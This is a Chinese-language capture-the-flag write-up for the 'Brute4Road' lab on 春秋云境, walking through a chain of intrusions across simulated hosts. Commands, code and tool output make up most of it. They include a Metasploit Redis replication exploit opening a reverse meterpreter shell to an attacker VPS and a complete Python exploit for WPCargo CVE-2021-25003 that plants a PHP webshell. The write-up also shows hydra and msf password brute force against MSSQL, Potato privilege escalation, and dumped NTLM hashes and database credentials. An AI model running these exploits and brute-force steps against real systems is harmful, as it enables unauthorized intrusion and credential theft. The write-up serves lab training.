Brute4Road - 春秋云境
靶标介绍:
Brute4Road 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
| 内网地址 | Host or FQDN | 简要描述 |
|---|---|---|
| 172.22.2.7 | 外网 Redis 服务器 | |
| 172.22.2.18 | UBUNTU-WEB02 | WordPress 服务器 |
| 172.22.2.16 | MSSQLSERVER.xiaorang.lab | MSSQL 数据库 |
| 172.22.2.34 | CLIENT01.xiaorang.lab | 远程桌面服务未启用 NLA 的主机 |
| 172.22.2.3 | DC.xiaorang.lab | DC |
Redis Master-Slave Replication
nmap 扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kali)-[~]
└─# nmap -p 21,22,80,6379 -sCV -oN nmap.txt xx.xx.xx.xx
Nmap scan report for xx.xx.xx.xx
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 4096 Jun 09 2021 pub
|_ftp-bounce: server forbids bouncing to low ports <1025
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:222.244.120.105
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 a6:99:5c:85:63:f9:a8:83:73:ef:2c:7b:da:a2:95:23 (RSA)
| 256 65:30:c7:36:07:3f:6a:bf:23:32:72:99:9a:2a:cf:c0 (ECDSA)
|_ 256 df:78:40:6a:25:13:8e:13:e8:1d:de:db:d3:3e:f4:1c (ED25519)
80/tcp open http nginx 1.20.1
|_http-title: Welcome to CentOS
|_http-server-header: nginx/1.20.1
6379/tcp open redis Redis key-value store 5.0.12
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
存在 redis 未授权访问和 ftp 匿名登录。
如果在连接 redis 遇见下面这样的问题,可能是你网络环境的问题,可以尝试使用流量(我一度以为是靶场出问题了 🥲)
1
2
3
4
┌──(root㉿kali)-[~]
└─# redis-cli -h xx.xx.xx.xx -p 6379
xx.xx.xx.xx:6379> info
Error: Server closed the connection
redis 版本是 5.0.12,使用 msf 打 redis 主从复制:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf6 > use exploit/linux/redis/redis_replication_cmd_exec
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts <target_ip>
rhosts => <target_ip>
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rport 6379
rport => 6379
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set lhost <atk_vps_ip>
lhost => <atk_vps_ip>
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost <atk_vps_ip>
srvhost => <atk_vps_ip>
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run
[*] Started reverse TCP handler on <atk_vps_ip>:4444
[*] <target_ip>:6379 - Compile redis module extension file
[+] <target_ip>:6379 - Payload generated successfully!
[*] <target_ip>:6379 - Listening on <atk_vps_ip>:6379
[*] <target_ip>:6379 - Rogue server close...
[*] <target_ip>:6379 - Sending command to trigger payload.
[*] Sending stage (3045348 bytes) to <target_ip>
[+] <target_ip>:6379 - Deleted ./xpecvqxg.so
[*] Meterpreter session 1 opened (<atk_vps_ip>:4444 -> <target_ip>:40332) at 2023-05-12 23:16:00 +0800
meterpreter > getuid
Server username: redis
利用 base64 进行 suid 提权(只能读取文件):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
meterpreter > shell
Process 4690 created.
Channel 1 created.
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
base64 "/home/redis/flag/flag01" | base64 --decode
██████ ██ ██ ███████ ██
░█░░░░██ ░██ █░█ ░██░░░░██ ░██
░█ ░██ ██████ ██ ██ ██████ █████ █ ░█ ░██ ░██ ██████ ██████ ░██
░██████ ░░██░░█░██ ░██░░░██░ ██░░░██ ██████░███████ ██░░░░██ ░░░░░░██ ██████
░█░░░░ ██ ░██ ░ ░██ ░██ ░██ ░███████░░░░░█ ░██░░░██ ░██ ░██ ███████ ██░░░██
░█ ░██ ░██ ░██ ░██ ░██ ░██░░░░ ░█ ░██ ░░██ ░██ ░██ ██░░░░██ ░██ ░██
░███████ ░███ ░░██████ ░░██ ░░██████ ░█ ░██ ░░██░░██████ ░░████████░░██████
░░░░░░░ ░░░ ░░░░░░ ░░ ░░░░░░ ░ ░░ ░░ ░░░░░░ ░░░░░░░░ ░░░░░░
flag01: flag{60d9345a-a851-426c-bc45-732e6599097a}
Congratulations! ! !
Guess where is the second flag?
使用 fscan 扫描内网:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
./fscan_amd64 -h 172.22.2.7/24 -hn 172.22.2.7 -pa 3389 -time 10 -nobr -np
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.18:22 open
172.22.2.3:135 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.18:445 open
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.18:139 open
172.22.2.16:139 open
172.22.2.3:139 open
172.22.2.34:135 open
172.22.2.16:135 open
172.22.2.3:88 open
172.22.2.34:3389 open
172.22.2.16:3389 open
172.22.2.3:3389 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle: http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetInfo:
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] NetInfo:
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] NetBios: 172.22.2.34 XIAORANG\CLIENT01
[*] NetInfo:
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
已完成 19/19
[*] 扫描结束,耗时: 6.126934887s
WPCargo RCE (CVE-2021-25003)
使用 wpscan 扫描 wordpress 站点:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
PS C:\> docker run --env http_proxy=socks5://<user>:<passwd>@<socks_proxy_host>:<socks_proxy_port> --env https_proxy=socks5://<user>:<passwd>@<socks_proxy_host>:<socks_proxy_port> -it --rm wpscanteam/wpscan --url http://172.22.2.18 --api-token <https://wpscan.com/profile>
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://172.22.2.18/ [172.22.2.18]
[+] Started: Sat May 13 03:54:18 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.22.2.18/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>
|
| [!] 16 vulnerabilities identified:
|
| [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - SQLi via Link API
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
|
| [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
|
| [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
|
| [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
|
| [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
|
| [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
|
| [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
|
| [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
|
| [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
|
| [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
|
| [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
|
| [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/gutenberg/pull/45045/files
|
| [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
| References:
| - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
| - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
[+] WordPress theme in use: twentytwentytwo
| Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 1.4
| Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wpcargo
| Location: http://172.22.2.18/wp-content/plugins/wpcargo/
| Last Updated: 2023-05-01T06:00:00.000Z
| [!] The version is out of date, the latest version is 6.10.4
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WPCargo < 6.9.0 - Unauthenticated RCE
| Fixed in: 6.9.0
| References:
| - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003
|
| [!] Title: WPCargo Track & Trace < 6.9.5 - Reflected Cross Site Scripting
| Fixed in: 6.9.5
| References:
| - https://wpscan.com/vulnerability/d5c6f894-6ad1-46f4-bd77-17ad9234cfc3
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1436
|
| [!] Title: WPCargo Track & Trace < 6.9.5 - Admin+ Stored Cross Site Scripting
| Fixed in: 6.9.5
| References:
| - https://wpscan.com/vulnerability/ef5aa8a7-23a7-4ce0-bb09-d9c986386114
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1435
|
| Version: 6.x.x (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:18 <========================================> (137 / 137) 100.00% Time: 00:00:18
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 72
[+] Finished: Sat May 13 03:55:05 2023
[+] Requests Done: 177
[+] Cached Requests: 5
[+] Data Sent: 43.709 KB
[+] Data Received: 264.229 KB
[+] Memory used: 321.418 MB
[+] Elapsed time: 00:00:47
存在 WPCargo < 6.9.0 - Unauthenticated RCE (CVE-2021-25003) 漏洞,exp 如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
def encode_character_code(c: int):
return '{:08b}'.format(c).replace('0', 'x')
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
注:destination_url 为目标 url 地址;cmd 为执行的命令。
查看 wp-config.php 配置文件,获取到数据库账号密码 wpuser/WpuserEha8Fgj9 :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
(www-data:/var/www/html) $ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '2:@4IUsHcd_lY*6hs~Ua[qiMSFroC=uhN-Z1KhZgMZQ?NfS6eBQbT g7Oe&mdEt/' );
define( 'SECURE_AUTH_KEY', '8Y{PAzEL{-echp2r:,V4F_,}2o;~tDUnvv30vw$qkugIjV^lAA&FL%q?Bp/*|BB[' );
define( 'LOGGED_IN_KEY', 'Of~!:^+Q5#}KV.hkx.xMOOkb|:^v,2BRv391KN&AV?$6>d4Y`yz=~?:,!>GK$Vcq' );
define( 'NONCE_KEY', 'ieXx>SkE%X.;Ztpxa }2l<}|=f4CT*LvMIXIJ`RI,B[$!% ~KUD)Mptnn]Q.~$@W' );
define( 'AUTH_SALT', '){I{7?W T3|W5ezK8d4[lg3JrYqx^>{e+^f_1=hcp4!/i~ ~wQYU*s`6N)]Tf~*3' );
define( 'SECURE_AUTH_SALT', '8QW&d>Ey3*&Dh]|:K.~.Fpk]qu-04iF&TF]{[^)I6,cf6^M.kug}`zn`?F3aplYr' );
define( 'LOGGED_IN_SALT', '$rD{;v;AT@HxF<0}Q6FV,!Pou~Qk$iWRw7ifGI/#U8U_?e=IO-eWDrREiD4j|:{%' );
define( 'NONCE_SALT', '_l8W[FC/?R$], ju=_lm$pB1/ONQziWc]Bj~Cmom;6)TQJ/i@o4sDYdyoM.Nu,/k' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
该数据库在目标服务器上,不对外开放端口,只能使用 webshell 管理工具上的“数据库管理”功能去连接本地地址(推荐使用哥斯拉)。
在数据库中发现 flag:
还在“something you might interested (你可能感兴趣的东西)”表中找到一堆密码:
MSSQL Brute Force
使用这些密码对 mssql 进行爆破,获取到数据库用户密码 sa/ElGNkOiC:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/home/kali/Desktop]
└─# proxychains4 -q hydra -l sa -P ./pass.txt 172.22.2.16 mssql -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-13 16:01:07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 999 login tries (l:1/p:999), ~63 tries per task
[DATA] attacking mssql://172.22.2.16:1433/
[STATUS] 360.00 tries/min, 360 tries in 00:01h, 639 to do in 00:02h, 16 active
[1433][mssql] host: 172.22.2.16 login: sa password: ElGNkOiC
[STATUS] attack finished for 172.22.2.16 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-13 16:02:42
还可以使用 msf 对 mssql 进行爆破:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf6 > use auxiliary/scanner/mssql/mssql_login
msf6 auxiliary(scanner/mssql/mssql_login) > set rhosts 172.22.2.16
rhosts => 172.22.2.16
msf6 auxiliary(scanner/mssql/mssql_login) > set username sa
username => sa
msf6 auxiliary(scanner/mssql/mssql_login) > set pass_file /pass.txt
pass_file => /pass.txt
msf6 auxiliary(scanner/mssql/mssql_login) > run
[*] 172.22.2.16:1433 - 172.22.2.16:1433 - MSSQL - Starting authentication scanner.
[!] 172.22.2.16:1433 - No active DB -- Credential data will not be saved!
[+] 172.22.2.16:1433 - 172.22.2.16:1433 - Login Successful: WORKSTATION\sa:ElGNkOiC
[*] 172.22.2.16:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
连接数据库,获取主机 nt service\mssqlserver 权限:
Potato 提权后查看 flag:
1
2
3
4
5
6
7
8
9
10
11
PS C:\> type C:\Users\Administrator\flag\flag03.txt
8""""8 88 8"""8
8 8 eeeee e e eeeee eeee 88 8 8 eeeee eeeee eeeee
8eeee8ee 8 8 8 8 8 8 88 88 8eee8e 8 88 8 8 8 8
88 8 8eee8e 8e 8 8e 8eee 88ee88 88 8 8 8 8eee8 8e 8
88 8 88 8 88 8 88 88 88 88 8 8 8 88 8 88 8
88eeeee8 88 8 88ee8 88 88ee 88 88 8 8eee8 88 8 88ee8
flag03: flag{ade0753b-b817-43ee-8901-febfd6be1a47}
导出 hash:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dfa8555b0bf46e5dac5aafe86bb2891e:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MSSQLSERVER01:1004:aad3b435b51404eeaad3b435b51404ee:ded5ad90b3d8560838a777039641c673:::
MSSQLSERVER02:1005:aad3b435b51404eeaad3b435b51404ee:3aa518732551a136003ea41f9599a1ec:::
MSSQLSERVER03:1006:aad3b435b51404eeaad3b435b51404ee:2f7c88f56a7236f476d18ea6b5a2d33a:::
MSSQLSERVER04:1007:aad3b435b51404eeaad3b435b51404ee:36bd3cceea3d413e8111b0bef32da84d:::
MSSQLSERVER05:1008:aad3b435b51404eeaad3b435b51404ee:b552da4a7f732c40ca73c01dfaea7ebc:::
MSSQLSERVER06:1009:aad3b435b51404eeaad3b435b51404ee:aa206c617e2194dd76b766b7e3c92bc6:::
MSSQLSERVER07:1010:aad3b435b51404eeaad3b435b51404ee:f9f990df1bc869cc205d2513b788a5b8:::
MSSQLSERVER08:1011:aad3b435b51404eeaad3b435b51404ee:465034ebde60dfae889c3e493e1816bf:::
MSSQLSERVER09:1012:aad3b435b51404eeaad3b435b51404ee:2dd7fe93426175a9ff3fa928bcf0eb77:::
MSSQLSERVER10:1013:aad3b435b51404eeaad3b435b51404ee:c3e7aa593081ae1b210547da7d46819b:::
MSSQLSERVER11:1014:aad3b435b51404eeaad3b435b51404ee:cee10216b2126aa1a3f239b8201120ef:::
MSSQLSERVER12:1015:aad3b435b51404eeaad3b435b51404ee:672702a4bd7524269b77dbb6b2e75911:::
MSSQLSERVER13:1016:aad3b435b51404eeaad3b435b51404ee:b808e9a53247721e84cc314c870080c5:::
MSSQLSERVER14:1017:aad3b435b51404eeaad3b435b51404ee:7c8553b614055d945f8b8c3cf8eae789:::
MSSQLSERVER15:1018:aad3b435b51404eeaad3b435b51404ee:6eeb34930fa71d82a464ce235261effd:::
MSSQLSERVER16:1019:aad3b435b51404eeaad3b435b51404ee:42c0eed1872923f6b60118d9711282a6:::
MSSQLSERVER17:1020:aad3b435b51404eeaad3b435b51404ee:82fe575c8bb18d01df45eb54d0ebc3b4:::
MSSQLSERVER18:1021:aad3b435b51404eeaad3b435b51404ee:31de1b5e8995c7f91070f4a409599c50:::
MSSQLSERVER19:1022:aad3b435b51404eeaad3b435b51404ee:9ce3bb5769303e1258f792792310e33b:::
